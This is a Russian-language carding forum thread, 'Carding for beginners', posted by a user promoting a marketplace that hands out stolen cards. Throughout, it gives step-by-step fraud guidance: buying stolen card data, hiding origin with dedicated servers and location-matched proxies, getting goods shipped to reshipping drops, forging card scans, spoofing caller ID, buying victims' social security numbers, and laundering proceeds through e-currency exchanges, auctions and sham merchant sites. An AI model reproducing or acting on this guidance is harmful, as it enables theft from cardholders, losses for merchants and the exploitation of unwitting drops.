1. HTML цвет текста

    ProMarket.ws - новый, активно развивающийся форум. Регистрируйтесь и Вас ждут приятные бонусы.
    У нас самая оперативная помощь новичкам!
    На форуме проводится постоянная раздача СС!

    Скрыть объявление
  2. HTML цвет текста

    Зеркало форума ProCrd в зоне Тор - http://wp3whcaptukkyx5i.onion/

    Стандартные зеркала форума - procrd.co procrd.me
    Скрыть объявление

Кардинг для начинающих. (Полная статья)

Тема в разделе "СТАТЬИ", создана пользователем Alterego, 10/10/16.

  1. Alterego

    Alterego ElusiveVBV ProMarket

    Регистрация:
    3/10/16
    Сообщения:
    27
    Симпатии:
    15
    Репутация:
    25
    Статья написана не мной, ссылки в статье на софт, некоторые уже не актуальны, но для общего развития и большего понимания всех тонкостей будет интересна. Кто то для себя извлечет что то новое, кто то освежит знания.

    Основные заблуждения.

    1. Хочу все и сразу.
    Первая ошибка в том, что новичок хочет сразу заниматься заливами, купить себе СС и перегонять на свою карту, такого не бывает. С СС перевести деньги на другую СС технически невозможно, можно только списать средства с СС. Я всегда советую начинать с вещевухи, как искать шопы, вбивать и принимать стаф, здесь все есть. Также статейка по общим понятиям по заливам есть.

    2. Безопасность. Меня посадят.
    Одна из главных проблем новичка — это боязнь, что его посадят. Почему-то думает, что он сразу начнет зарабатывать миллионы и за ним непременно следят. Если ты скардишь даже пускай сотню товаров из шопа, то шанс, что за тобой придут, равен или почти равен нулю! И это самое главное, что нужно себе вбить. Когда ты вбиваешь в шоп с дедика, ты уже скрываешь свой реальный ip, причем используешь не сокс, а именно дедик, который имеет наибольшую анонимность.
    Да, когда в месяц доходы будут больше 2,000$, то следует купить себе ВПН, ВПН — это те же дедики, но только соединенные один маршрутом, связка ip, т.е. реальное местоположение будет не реально вычислить, если, например, сервера для ВПНа находятся в Панаме или Шри-ланке, потому что власти этих стран по дефолту не будут раскрывать логи Интерполу.

    3. Легкие деньги.
    Возможно, ты уже знаешь, что все продавцы дампа+пина это все лохотрон. А если нет, то предупреждаю деньги за деньги никто не продает, чудеса возможны только в стране дураков.

    Предисловие. Куда можно вбить и как на этом заработать.

    1. Шопы. Плюсы: относительно легко найти шлющий шоп. Минусы: шопы быстро помирают, маленький % чистого дохода от вбива. Как искать шопы и как анонимно принимать стаф есть в материалах.

    2. Свой мерчант счет. Плюсы: доход от вбива до 95%. Минусы: стартовый капитал на поднятие своего мерчанта, сложность найти мерчант с большим процентом допустимых чарджбеков или с мгновенным выводом. Как открыть свой мерчант счет есть в материалах.

    3. Брокерские конторы, типа форекс и биржи. Вбивать СС смысла нет, но можно купить с логов такие аккуанты и открыть счет на дропа с таким, же именем и фамилией, как у холдера и слить все деньги на дропа.

    4. Покер аккуанты и конторы со ставками на спорт. Можно конечно заниматься чипдампингом и придумывать свои цепочки, а можно пойти проще через небольшой обман. Тема по выводу есть в материалах.

    5. Мобильные операторы. Скажу сразу, что в СНГ операторов вбить не получится, не спорю такие мерчи есть, но лимиты на пополнения колеблются около 10$, это просто того не стоит, чтобы тратить свое время.

    6. Онлайн игры. На данный момент, вбив в СНГ игры умер напрочь, зарабатывать на этом не получится, деньги могут списаться с СС, но на счет игры не поступят, если придут, то быстро локнут аккуант. Так, что вбиваем только в пиндосовские игры или покупаем золото у поставщиков. Вбивается лучше с пайпел, нежели с СС. Если один будет вбивать, а другой выводить, то можно хорошо сработаться.

    7. Платежные системы. Не стоит вбивать в пайпел, хотя бы, потому что цены на аккуанты доступны, также нет смысла вбивать в манибукерсы (скрил) эта платежка больше себя позиционирует для оплаты товаров и услуг, нежели для расчетов. А вот вбивать в алертпей смысл есть, достаточно принять смс, отправить 2 скана и можно вбивать.

    8. Остальное. Это всевозможные лохотроны, ммм, соцсети, хостинг, реклама, порно и т.д. 1 правило вбить в СНГ сайты не получится, за исключением, если не прикручен пайпел, алертпей и им подобные.
    Поздравляю тебя, ты сделал верный шаг на встречу к большим деньгам. Можно было полгода и более потратить на самообучение, ни один раз обжечься и начать зарабатывать деньги или вовсе разочароваться и бросить это дело. А можно прочесть эту статью до конца, осознать все и не просто хорошо зарабатывать, а начать косить бабло.
    Когда человек далекий от кардинга, слышит слово «кардинг», ему в голову начинают приходить образы заливов, как он снимает деньги с буржуйских карточек и перегоняет на свои счета. Такого не бывает. Нельзя просто взять с одно СС на другую СС слить бабло. Можно с роллки (СС с онлайн банкингом) перевести деньги на СС (карту) дропа одной и той же страны. Цены на карты начинаются от 400$ и заканчиваются 5000$, а залить на них миллионы не получится, т.к. все упирается в лимиты.
    Деньги с СС можно перевести на счет казино, покера, платежной системы и оттуда вывести, но это уже не будет называть заливом, это можно обозвать темой слива с СС. Так вот темы слива денег с СС никто просто так палить не будет. Есть паблик темы, о которых можно прочесть в следующих статьях, а есть приват темы, до которых нужно доходить самому. Да, темы продают, попадаются и достойные, разброс цен держится от 100$ до 3000$, во всяком случае, на глаза мне темки дороже не попадались. Только подвох в т.ч. купив тему, пускай даже через гаранта, тебе никто не даст гарантии, что тема не умрет на следующий день. Как правило темы слива живут в среднем месяц-два, далее или вовсе все накрывается, или будут вводится лимиты, дополнительные проверки, ограничения и т.п. В этом направлении можно работать и зарабатывать, но чтобы прям зарабатывать миллионы, не выйдет.
    Забегая вперед, скажу, что миллионы крутятся только в банковских заливах. Кто в состоянии держать свои ботнеты, те в первую очередь выдергивают логи с банковскими аккуантами и сливают на своих дропов, а все то, что продают это шлак или небольшие балансы, или не хватает дополнительных кодов, танов, смс подтверждения, или банк не удобен для слива, долго идет транза, быстро лочат. Кстати говоря, поэтому и цены на СС столь низкие, СС идут вместе со всеми логами, деньги со счетов сливают не кислые, а СС продают сразу оптом, как дополнение к основному доходу.

    Теперь спустимся на более реальную землю, заливы это хорошо, но нужен для старта капитал. А мы же хотели с нескольких десяток долларов зарабатывать на хлеб с солью, а лучше с икрой. Так вот. Есть такое волшебное место и это место вещевуха. Вбиваем стаф на дропа и получаем свой процентик. Один шоп, это по сути одна тема по сливу, если задрочить помрет также быстро. Только разница в том, что ежедневно новых шопов появляется в сотни раз больше, чем контор, которые принимают оплату. Шопов просто больше, их легче искать, не шлющий шоп без труда заменяется шлющим и так по кругу. Поиск шопа можно разделить на три этапа, первый, это отсев, подробнее можно прочить в статье ищем шоп, здесь основная задача это составить список потенциальных шлющих шопов, на втором этапе, саппортам всех этих шопов пишем легенду что я такой-то хочу отправить подарок такому-то в Россию, как мне это лучше сделать и в зависимости от тематики шопа выбираем от деда к сыну, от мужа к жене и т.д., на третьем этапе, уже по всем тем шопам, которые нам ответили положительно, пробуем вбить СС, вбиваем на небольшую сумму, дабы просто проверить шлет ли шоп вообще. Если придерживаться данной последовательности, отошлют стаф 9 из 10 шопов. Теперь посчитаем наши возможные доходы. Стафер получает в среднем 30% от цены в шопе товара. За час делается три вбива, за сутки 20, это мы берем не по верхней планке. 600$ — усредненная стоимость одного пака, если слать на дропов США или Европы, то сумма будет выше. И так. 600 умножаем на 20 вбивов и от этой суммы забираем свои 30% и получаем 3600$ дохода за одни сутки.

    Слово «обналичка» вызывает разные ассоциации. У кардера с этим связано очень многое, в частности — дропы, платежные системы и, разумеется, большие деньги :).
    Но в итоге все сводится к одному — извлечению из виртуальных карточек вполне реальных денег. Например, WebMoney. Конечно, готовых рецептов “cc > WM” я не дам. Таких просто не существует. Многих новичков обманывают именно таким способом, потому что любого человека, только пришедшего в кардинг, будет терзать мысль: «Как же мне поскорее обналичить кредитную карту в WM и поиметь много $?»

    Способ № 0 — продажа

    Самый элементарный способ – продажа кредитных карточек. Его можно даже назвать примером “cс to WM”. Ты даешь кредитную карточку — тебе тут же перечисляют практические легальные деньги.
    Потенциальная валидная (т.е. с лежащей на ней энной суммой денег) креда стоит в среднем $2-3. Очень небольшие деньги, если учесть, что на кредитной карте может лежать до нескольких тысяч долларов, которые ты впоследствии сможешь тратить практически как заблагорассудится. Пусть не все, но какую-то часть тебе наверняка удастся извлечь. Как? Об этом я тебе сегодня расскажу.

    Способ №1 – перевод

    Давай посмотрим, как осуществить перевод денег «СС > E-Gold > WM» (кредитная карта – ЭПС «E-Gold» — WebMoney). Дело в том, что E-Gold деньги ты сможешь купить прямо с кредитной карты, а их уже без проблем можно перевести на WM, обменников сейчас в Сети очень много (их список можно найти, например, на www.golddirectory.com), главное — выбрать подходящие тебе проценты. Конечно, здесь есть и сложности — у тебя могут попросить подтверждение по телефону, скан карты и документа, удостоверяющего личность. В этом случае, если ты не кардхолдер, деньги получить очень непросто.

    Происходит все так. Ты ищешь на вышеуказанном сайте обменники, которые принимают кредитные карточки. Вбиваешь креду, указывая, сколько денег тебе нужно перевести с твоей карты на аккаунт в системе E-Gold. Ждешь несколько часов или, иногда, дней. Затем, если все проходит успешно — открываешь свой e-gold-аккаунт и удивляешься лежащей там сумме :). Но не все так просто, как кажется. Кардхолдер (хозяин креды) обязательно сделает чардж–реверс (возврат денег), когда увидит, что проклятый кардер нагло спер его честно заработанные деньги. Ребята из обменника отпишут в E-Gold – «помогите, нас ограбили». И твой E-Gold-аккаунт закроют вместе с деньгами. Так что очень важно успеть еще эти деньги отмыть. Есть люди, которые этим занимаются – ты шлешь им нелегальные деньги со своего аккаунта, а они отправляют тебе легальные WebMoney.
    Ты можешь возразить: мол, можно найти обменник E-GOLD > WM и быстренько самому обменять, чтобы не платить процент (и немалый) от ворованных денег нальщику (так зовут этого самого посредника). Но имей в виду, что вскоре этот обменник – после того, как E-Gold заберет у него деньги – свяжется еще и со службой поддержки WebMoney и потребует вернуть деньги. WM с удовольствием это сделает, плюс обязательно заблокирует твой WM ID. То есть весь Keeper. В общем, девиз любого кардера — “Хочешь жить, умей вертеться”.

    Способ № 2 – отмыв через аукцион

    Идем на интернет-аукцион www.molotok.ru и выкладываем там лот: «Домен + хостинг за XX $ в год! Оплата по WM». Потом, когда появятся покупатели, начинаем покупать по чужим кредам домены и хостинг на www.webhosting.com и продавать за XX $ покупателям с аукциона.
    Казалось бы, все просто. Но через некоторое время после продажи домены и хостинги… накроются. Почему? Да все потому же — кардхолдер потребует вернуть украденные деньги, банк заберет деньги у ВорлдХостинга, который, в свою очередь, прикроет домены. Получается, что твои покупатели выбросили деньги на ветер, а ты стал кидалой. Не здорово, правда?

    Способ №3 – партнерские программы

    Для того чтобы осуществить этот способ, нам придется найти партнерские программы, которые платят за клики или показы баннеров. Делаем сайт, где выкладываем эти самые баннеры и скрипты спонсоров, покупаем много-много трафика на сс. И — ждем свои WM.
    Тут, думаю, все шоколадно. Но контент твоего сайта должен быть солидным, чтобы не привлекать внимание службы поддержки партнерских программ. Ведь они собираются тебе платить, и если твой сайт будет представлять собой кашу из невразумительного текста и подозрительного дизайна, а счетчики будут показывать тысячи посетителей ежедневно, то это вызовет справедливые подозрения. Что может привести к закрытию твоего акка. Этому способу посвящена целая статья этого номера, поэтому я не буду останавливаться на нем подробно.

    Способ №4 – Задай себе вопрос за деньги

    Наш путь лежит на swapsmarts.com, в раздел «эксперт». Для реализации этого способа надо взять кучу карт без кода, создать аккаунты на этом сайте и задавать себе (как эксперту) вопросы из разных категорий. Каждый вопрос стоит определенную сумму (ее ты требуешь сам ;)). За 2-3 вопроса в день вполне может набежать 10-20 долларов, и так – постоянно. При выводе придется попросить выслать чек, а при обнале — попросить перевести на WM. Таким образом, за виртуальное общение с самим собой вполне реально заработать до 500 долларов в месяц.

    Способ №5 – Поторгуйся сам с собой

    Что нам мешает покупать домены на cc и продавать их уже за WM? Существует много сайтов, где продают готовые проекты или солидные эксклюзивные шаблоны для сайтов. Их тоже можно покупать на сс и продавать через выгодную тебе платежную систему.
    Торговать с самим собой можно и другим способом. К примеру, сделать РЕАЛЬНЫЙ сайт по продаже какого-нибудь сервиса или софта. Сайт должен быть именно реальный, чтобы мерчант мог это проверить и ничего не заподозрить. Затем – регистрируем аккаунт у мерчанта, ставим невысокую цену, устанавливаем все у себя на сайте. Осталось только раскрутить сайт, купить трафик за СС, и, когда у тебя наберется достаточно посещений, можно начинать покупать у самого себя, только в разумных пределах и анонимно, опять же — мерчант не должен ничего заподозрить. Таким образом можно сделать пару сайтов и потихоньку работать. Главное — не переборщить и знать меру. Потом, естественно, получить сокровенные WM, если мерчант позволяет такую услугу, или, получив чек, перевести его во все те же WM.

    Способ №6 – рекламируй свои услуги

    Достаточно простой, на мой взгляд, способ. Для его осуществления тебе нужно каким-то образом разрекламировать услугу: «Делаю хостинг с доменным именем для сайтов for life за n webmoney». А потом, после каждого заказа, заполнять маленькую форму на www.hostonce.com и вписывать туда свои креды. На hostonce практически не проверяют cc, и сайт никогда не закроют. А на следующий день тебе останется получить свои “честно” заработанные webmoney. Разумеется, за отлично исполненный заказ.

    Способ №7 – Задорно, но не порно?

    Главное здесь – найти через какой-нибудь поисковик (например, google.com) Adult-спонсоров, которые предоставляют уже готовый магазин (к примеру, www.sextoyfun.com).
    Эти спонсоры дают тебе процент с продаж с твоего (точнее, предоставленного тебе) сайта и платят за привлечение рефералов. Остается только прикинуться порноманьяком — вбить карты на своем шопе. Потом, уже в роли порнопродавца, заказать чек через Western Express на WebMoney (если спонсор не работает сразу через WM).
    У этого способа есть неоспоримый плюс – не надо ничего делать. Ни тебе сайтов, ни подключения к биллингам. Но есть и минус — обычно дают не больше 25% с продажи.
    Заключение

    Я описал далеко не все способы обналички денег с кредиток. А вот заниматься кардингом или нет — это дело лично каждого. Могу лишь посоветовать не быть назойливым, иметь терпение, читать умные книжки и, разумеется, наши статьи :).
    Потенциальная валидная (т.е. с лежащей на ней энной суммой денег) креда стоит в среднем $2-3.
    WM с удовольствием это сделает, плюс обязательно заблокирует твой WM ID. То есть весь Keeper.
    Таким образом, за виртуальное общение с самим собой вполне реально заработать до 500 долларов в месяц.
    На hostonce практически не проверяют cc, и сайт никогда не закроют.

    Вбив.

    Скардить товар не намного сложнее, если покупать его за свои деньги. По сути скопировал данные сс, вставил в окошки и профит, ничего сложного, это так и есть, а теперь ближе к делу.

    Что нужно для успешного вбива?

    - Материал. СС и Дедик, дедик берем сразу под штат СС.
    - Шоп. Шопы шлют ВСЕ, иначе интернет-магазинов просто бы не существовало. Отличие лишь в том, что к каждому нужен свой подход, одни не шлют в отдельные страны вовсе, другие не шлют на большие суммы, третьи не шлют, потому что сс без vbv кода и т.д.

    По шагам.

    1. Покупаем СС, лучше без vbv кода. На заметку: 1. Есть шопы, которые не просят vbv код, даже если СС с кодом.

    2. Если вбивать электронику, то с вероятностью 98% без vbv кода вбить СС не прокатит, т.е. придется покупать только с vbv.

    2. Покупаем дедик под штат СС.

    3. Ищем шоп. Если есть шоп, пункт пропускаем.

    4. Регистрируем почту. Регистрируем в зоне com, с абстрактным названием чтобы сошло для женщины и для мужчины, например, watercould98, likechokоlade и т.п.

    5. Заходим на дедик.

    6. Вбиваем. ну и все) Важный момент шипинг и билинг адресов. Здесь нужно экспериментировать или узнавать у саппорта шлет ли на отличный биллинг или нет. Есть шопы, в которых указываешь одинаковый билинг и шипинг адрес причем сразу дропа, данные сс не меняешь, т.е. идет соответствие адресов, но нет проверки адреса и холдера. Самые удобные шопы для вбива)
    Чтобы шоп слал на одного дропа несколько раз можно менять местами имя и фамилию, делать 2-3 ошибки в имени, также указываем адрес соседа.
    Любые проблемы лучше решать, написав сразу саппорту, что и почему не проходит оплата, они ответят и если повезет, за тебя сами проведут оплату.
     
    ProMarket и Cboloch нравится это.
  2. Alterego

    Alterego ElusiveVBV ProMarket

    Регистрация:
    3/10/16
    Сообщения:
    27
    Симпатии:
    15
    Репутация:
    25
    Вещевой кардинг

    Вещевой кардинг получил наибольшее распространение среди кардеров. Его суть заключается в заказе товаров в интернет-магазинах по чужим кредитным картам с целью последующего сбыта.
    Схема работы вещевика, вроде бы, лежит на поверхности. Это привлекает многих начинающих кардеров, которым все кажется понятным и простым. На самом деле заниматься вещевым кардингом не так легко. Чтобы получать доход, нужна цепочка людей, которые будут слаженно работать.
    Как закалялась сталь

    В середине 1990-х годов никто еще не слышал о махинациях с кредитными картами, а редкие случаи пропажи денег были ошибками магазинов и банков. Поэтому непуганые интернет-магазины охотно принимали несуществующие сгенерированные кредитные карты, алгоритм которых был таким же, как и у настоящих карт. Проверив алгоритм, интернет-магазины высылали заказанный товар. Обман вскрывался только в конце месяца, когда магазины запрашивали у банков перевод денег с карт на оплату товара. Естественно, что денег магазин не получал, так как запрошенных кредитных карточек просто не существовало в природе.

    В это время в странах СНГ стало возможным получить доступ к интернету. Первыми пользователями были в основном преподаватели и студенты вузов. Эти студенты и составляли основу зарождающегося кардерства СНГ. Голодные студенты кардили все, что только можно, делая упор на электронику и ювелирные изделия. Особым рвением отличались украинские кардеры, которые организовали в Киеве целую сеть по транспортировке, хранению и сбыту накарженного. Десятки квартир покупались под склады для хранения электроники, которую не успевали сбывать по бросовым ценам. На таможенном терминале в киевском международном аэропорту Борисполь круглосуточно дежурили несколько грузовиков, вывозивших груз после каждого международного рейса. Таможенники, быстро оформлявшие прибывшие грузы, тоже в накладе не оставались [​IMG]. Товар из европейских магазинов в основном доставлялся наземным путем. Объем товара был настолько велик, что нередко магазины отправляли свои фуры прямо на Украину, не прибегая к услугам почты. Многие магазины всерьез задумались об открытии своих филиалов в СНГ.
    Товар сбывался по подложным документам через оптовые и розничные магазины, которые были заинтересованы в покупке фирменной электроники по низким ценам. Огромный поток скарженной электроники привел к затовариванию украинского рынка. Сложилась парадоксальная ситуация, когда можно было купить оперативную память по цене в два раза дешевле отпускной цены производителя. Легальные поставки электроники, особенно компьютеров, практически прекратились.

    Сказка не могла длиться вечно. ФСБ совместно с Интерполом уже некоторое время следили за вызывающей деятельностью кардеров. В 1996 году по Украине, России и Белоруссии прокатилась волна арестов. Главари кардерских группировок и их приближенные были арестованы. О дальнейшем существовании таких сообществ не могло быть и речи, теперь каждый был сам за себя. Товар старались сбыть сразу после получения, работали в основном поодиночке или небольшими группами, не привлекая лишних людей.

    Палки в колеса

    Долго такой беспредел продолжаться не мог. Из-за действий кардеров очень многие интернет-магазины разорились. Оставшиеся магазины объявили страны СНГ вне закона и перестали слать в СНГ товар. Причем даже по легальной кредитной карте заказать что-то в иностранных магазинах жителям СНГ было очень и очень трудно. В то время мой знакомый заказал в европейском интернет-магазине по своей кредитке какую-то редкую книгу. После заказа ему позвонили из магазина и попросили назвать все реквизиты его кредитной карточки. Потом попросили выслать отсканированную с двух сторон кредитку. И когда все требования магазина были выполнены, оттуда после недели раздумья пришел ответ, что по техническим причинам товар не может быть выслан. Такие пироги.

    Многие думали, что это конец недолгой жизни вещевого кардинга, но выход был найден. Если они не шлют нам, то будут слать в свою страну! Теперь кардеры искали иностранца, который бы принимал товар и за вознаграждение пересылал его в СНГ либо продавал у себя на родине, высылая часть денег (а часть себе в карман). С тех пор кардеры специализируются по регионам: США, Великобритания или Европа. При этом, например, европейские магазины без проблем шлют товар в пределах Европы, в том числе и в такие близкие нам страны, как Латвия, Болгария и даже Украина.

    Следующим ударом по кардерскому ремеслу стал постепенный отказ в приеме сгенерированных кред. В связи с большими убытками магазинов, у банков появились новые сервисы, позволяющие магазину проверять достоверность данных о кредитной карте на лету или в разумные сроки (раньше магазин узнавал, что его надули, уже после того, как покупка отправлялась заказчику). И теперь магазин мог отсеять несуществующую кредитку еще до отсылки товара. Но и эту преграду удалось преодолеть. Из-за несовершенства защиты интернет-магазинов можно было утянуть у них базу данных с информацией о кредитных картах клиентов, делавших у них покупки.

    С этого момента многие добропорядочные американцы боялись делать покупки в интернет-магазинах. И правильно делали. Каждый магазин уверяет покупателей, что у него самая надежная защита. Но было бы намного лучше, если бы магазины просто не хранили информацию о покупателях у себя на сервере. Иногда можно, введя в поисковике что-нибудь типа «credit card name adress», выйти на список кредитных карт, который хранится на сервере интернет-магазина. То есть информация о кредитных картах в этом случае настолько незащищена, что даже индексируется поисковыми системами! Теперь, когда в магазине делали заказ по существующей карте, он снимал с нее деньги (или просто проверял ее существование, а деньги снимал в конце месяца). Через некоторое время настоящий владелец карты обращался в банк и опротестовывал транзакцию. Банк, в свою очередь, разбирался с магазином. Но поезд ушел, товар выслан, а магазин опять в дураках.
    Новым шагом в защите от фрауда стал запрос магазинами кода cvv2 при покупке. Тут уж думали, что кардингу пришел конец. Фишка здесь в том, что этот код — 3 последние цифры номера на задней стороне карты, знать его может только владелец карты, который держит ее в руках. Теперь любые махинации с кредитными картами стали в принципе невозможны, так как код cvv2 узнать нельзя никак. Изначально планировалось, что cvv2 не будет сохраняться ни на какой стадии обработки кредитной карты. То есть он сообщался только банковской системе обработки карт, а уже из банка шло подтверждение или отказ. Но хотели как лучше, а получилось как всегда. Интернет-магазины, нарушая все требования банков, стали сохранять код cvv2 со всей остальной информацией о кредитных картах в своих базах данных. Ну, а базы, в свою очередь, так же спокойно, как и раньше, воровались, а кардеры получали доступ к cvv2. Все вернулось на круги своя. И пенять интернет-магазинам оставалось только на себя.

    Вещевой кардинг сегодня

    Сейчас вещевой кардинг переживает не лучшие времена, но и сдавать позиции не собирается. Наблюдается некое равновесие среди покупок в интернет-магазинах: с одной стороны, потери интернет-магазинов на кардерских заказах покрываются прибылью с легальных покупок, с другой стороны, этих заказов хватает кардерам, чтобы свести концы с концами и не умереть с голоду. Сегодня вещевой кардинг продолжает оставаться популярным среди новичков, хотя некоторые и разочаровываются в нем, забывая про кардинг навсегда.

    Анонимность и безопасность

    Главное, на что стоит обратить внимание, это безопасность и анонимность при занятии вещевым кардингом. При заказе товара в интернет-магазине специальные скрипты могут узнать дополнительную информацию о пользователе. Так, например, если ты работаешь с американскими интернет-магазинами, то и твой компьютер должен выглядеть как компьютер типичного американца. Это значит, что установленная операционная система должна быть от начала и до конца английской — магазин может насторожить даже наличие русского языка для ввода с клавиатуры. Твой часовой пояс должен быть не просто американским, а соответствовать локальному часовому поясу твоего дропа (человека, который получает товар из магазина и пересылает тебе). При заказе в интернет-магазине обязательно использование анонимного proxy-сервера. И крайне желательно, чтобы IP этого proxy-сервера соответствовал штату твоего дропа, а еще лучше городу.

    Практические советы

    Тебе также следует знать, что настоящий американец совершает покупки в интернет-магазине либо во время обеденного перерыва на работе, либо вечером у себя дома. Соответственно, в эти часы интернет-магазины получают больше всего заказов, и у твоего заказа будет меньше шансов привлечь внимание менеджеров магазина. Отдельно стоит упомянуть покупки подарков на Рождество и другие праздники. В этот период с виртуальных полок интернет-магазинов покупатели метут все подряд, раскупается даже самый залежалый товар. Интернет-магазинам на этот период приходится нанимать дополнительных работников. Также стоит обратить внимание на официальные выходные в той стране, на которой ты специализируешься. Заказы, сделанные в праздничные дни, будут обработаны только через несколько дней, а эта задержка может стать роковой, так как у владельца карты будет время, чтобы опротестовать платеж.

    Кредитную карту для покупки в интернет-магазине следует подбирать очень тщательно. Карта должна соответствовать штату, а лучше городу твоего дропа, тогда можно попробовать указать при заказе разные адреса дропа и владельца карты и постараться убедить магазин, что ты (как владелец карты) решил сделать подарок своему племяннику на другом конце города. Если есть возможность, лучше купить карту с онлайн-доступом. В таких картах можно заходить на сайте банка в специальный раздел и менять там адрес держателя карты. Если адрес сменить на адрес дропа, то у магазина в принципе отпадут всякие сомнения в легальности покупки, так как он высылает покупку на адрес держателя карты. Но и тут все не так просто. Дело в том, что смена адреса держателя карты очень схожа с шаманством и плясками с бубном вокруг костра. Иногда адрес на карте меняется без вопросов, а иногда банк начинает сомневаться и ничего не получается. Кстати, многие кардеры очень суеверные люди [​IMG].

    Интернет-магазин, в котором будет сделан заказ, также надо тщательно подбирать. Не стоит делать заказ в больших интернет-магазинах с хорошей службой безопасности. Надо выбрать небольшой интернет-магазин, который обычно является лишь интернет-витриной обычного магазина. Доля покупок через интернет в таком магазине очень мала, поэтому нет квалифицированного персонала, отслеживающего покупки кардеров.

    Если интернет-магазину что-то кажется подозрительным, он может потребовать выслать ему отсканированную кредитную карточку или спросит твой телефон, либо предложит тебе самому позвонить в магазин. Скан кредитной карты наши умельцы тебе за несколько десятков баксов сделают такой, что будет лучше оригинала [​IMG], а вот с телефоном придется помучиться. Можно договориться со своим дропом о подтверждении по телефону, можно найти отдельного человека. И если с дропом все просто, то отдельный человек может жить в другом штате. Тогда придется пользоваться антиАОНами, которые подменят номер телефона на тот, который будет соответствовать штату дропа.

    В последнее время стала очень актуальной тема по интернет-магазинам Австралии и Новой Зеландии. Из-за их отдаленности от других стран там существует лишь немногочисленный местный вещевой кардинг, который контролируется китайской мафией. Поэтому магазины без лишних вопросов шлют товар не только по своим странам, но и за границу, даже в Россию. Правда, срок доставки в Россию намного больше, чем из Америки, из-за хуже развитых служб почтовой доставки. Еще одной проблемой является добыча австралийских и новозеландских кредитных карт. Из-за того, что из этих стран мало кто кардит, очень малое количество карт можно приобрести. А если у продавца и появляются австралийские кредитки, то по ценам в несколько раз больше американских или европейских.

    Ох уж эти дропы

    Если магазин все-таки выслал товар, то все равно еще рано пить шампанское и праздновать победу, так как между тобой и товаром есть еще дроп. Очень часто дропов берет ФБР, а иногда сами дропы могут тебя кинуть. В найме дропа есть два пути. Первый — с самого начала все ему рассказать, чтобы он знал, на что идет. В этом случае он сможет подтверждать заказы по телефону и всячески способствовать получению товара. Либо можно найти какую-нибудь домохозяйку, которая за несколько сотен в месяц будет не прочь подработать получением и пересылкой посылок. Но у этого пути есть куча минусов. Домохозяйка, будучи существом глупым [​IMG], может делать такие вещи, которые ты себе и представить не сможешь. Например, был случай, когда на адрес такого вот дропа пришла посылка, но из-за того, что дропа несколько раз не заставали дома, посылку отправили обратно в магазин. И это при том, что время прихода почтальон каждый раз согласовывал с домохозяйкой по телефону! Но даже когда товар благополучно получен дропом и выслан тебе, радоваться все еще рано. Бывали случаи, когда дроп путал адрес, и посылка отправлялась обратно. Радоваться будешь, когда товар будет уже у тебя в руках.

    А как же Россия?

    Многих, наверное, мучает вопрос о российских интернет-магазинах. Сам факт кардинга из российских магазинов подразумевает использование кредитной карты нашего соотечественника. Среди кардеров существует негласное правило — не трогать своих. И если на кардерских форумах проскакивает объявление о продаже базы с русскими кредитками, то оно сразу удаляется. Еще одна причина — бдящие [​IMG] службы безопасности интернет-магазинов, тесно сотрудничающие с правоохранительными органами. И если, кардя товар из американских магазинов, кардер может не беспокоиться, что из-за нескольких ноутбуков его объявят в международный розыск, то ФСБ по наводке российского интернет-магазина быстро найдет мошенника.

    Бесконечная история

    Несмотря ни на что, кардинг продолжает жить. И на каждую новую уловку магазинов найдется свое средство. Главное помнить, что все, в конечном счете, зависит от менеджера интернет-магазина, который занимается твоим заказом. Был у меня случай, когда магазин не захотел мне высылать товар, требуя телефонного звонка. Тогда я написал им жалобное письмо, что сейчас не имею доступа к телефону, а цифровой фотоаппарат предназначается моему сыну, у которого через три дня день рождения. А подарок как раз тот, о котором сын давно мечтал. Я попросил выслать покупку и пообещал, что обязательно позвоню в магазин через неделю. И это сработало! Так что никогда не стоит забывать про человеческий фактор [​IMG].

    Схема вещевого кардинга

    Кардер, предварительно организовав свою безопасность и анонимность в Сети, делает заказ в интернет-магазине.
    Магазин может попросить позвонить и/или выслать отсканированную кредитную карту. Скан кредитки рисует специальный человек. Звонок в магазин тоже делается человеком с антиАОНом, чтобы все выглядело, как будто звонит законный владелец карты.
    Магазин высылает покупку твоему человеку (дропу) в стране, где находится интернет-магазин.
    Дроп продает товар на месте, оставляя часть денег себе, либо пересылает товар тебе.

    Кредитки с онлайн-доступом

    Многие американские банки предоставляют своим клиентам доступ к информации о кредитной карте на банковском сайте. Введя на сайте номер карты и пароль, клиент может посмотреть статистику транзакций, изменить адрес и т.п. На самом деле из любой кредитной карты соответствующего банка можно сделать карту с онлайн-доступом. Для этого надо, кроме информации о кредитной карте, знать лишь номер социального страхования ее владельца, который известен только ему самому. Но в интернете можно найти людей, которые имеют доступ к базам данных с номерами социального страхования. И за 5-10 баксов они по имени владельца карты выдадут тебе номер социального страхования.
     
    ProMarket и Cboloch нравится это.
  3. Alterego

    Alterego ElusiveVBV ProMarket

    Регистрация:
    3/10/16
    Сообщения:
    27
    Симпатии:
    15
    Репутация:
    25
    Proxy-серверы

    Лучше всего proxy-серверы покупать, тогда ты сразу получаешь именно тот сервер, который тебе нужен. Но если ты начинающий кардер и денег у тебя немного, то можно взять адреса серверов на сайтах, посвященных компьютерной безопасности (www.void.ru, например). Отсортировать сервера по штатам и городам поможет программа Proxy Checker. Теперь, когда ты нашел сервер нужного тебе штата, подставь адрес и порт сервера в свой браузер.
    Чтобы убедиться в своей анонимности, зайди на www.privacy.com и просмотри путь пакетов от сервера privacy.com. Последним адресом пакетов должен быть твой proxy-сервер.
    Схема работы вещевика, вроде бы, лежит на поверхности. Это привлекает многих начинающих кардеров, которым все кажется понятным и простым. На самом деле заниматься вещевым кардингом не так легко.

    Самый правильный хостинг

    Любой кардер должен иметь ряд незаменимых вещей. Это кредитка, хороший хостинг (чтобы дурить наивных буржуев) и, конечно же, домен. Домен — это не пустой звук и предмет понтов. Именно звучное имя проекта притягивает к себе новых клиентов и вызывает уважение к его владельцу. Разумеется, чтобы не иметь никаких проблем после регистрации домена, следует уделить большое внимание двум вещам. Во-первых, названию домена, которое, как я уже сказал, имеет огромное значение. А во-вторых, грамотно выбрать хостинг, который предоставит любителю картона заветное имя второго уровня. Если первый пункт останется на совести кардера, то со вторым тебе поможет разобраться эта статья.

    Сказание о хостингах

    Как уже было сказано, необходимо выбрать хороший хостинг, чтобы зарегистрировать домен. Компании, предоставляющие подобные услуги, делятся на несколько видов: те, которые прописывают имя на собственном сервере и предоставляют владельцу определенные права (FTP/WEB/SSH доступ), а также дающие только зону для домена. При этом первичный и вторичный DNS-серверы должны являться собственностью клиента. Существует и третий вариант — золотая середина, хостинг, позволяющий переносить зоны на другой DNS-сервер. Таким является знаменитый www.verio.net. Об этой компании и пойдет речь в этой статье.
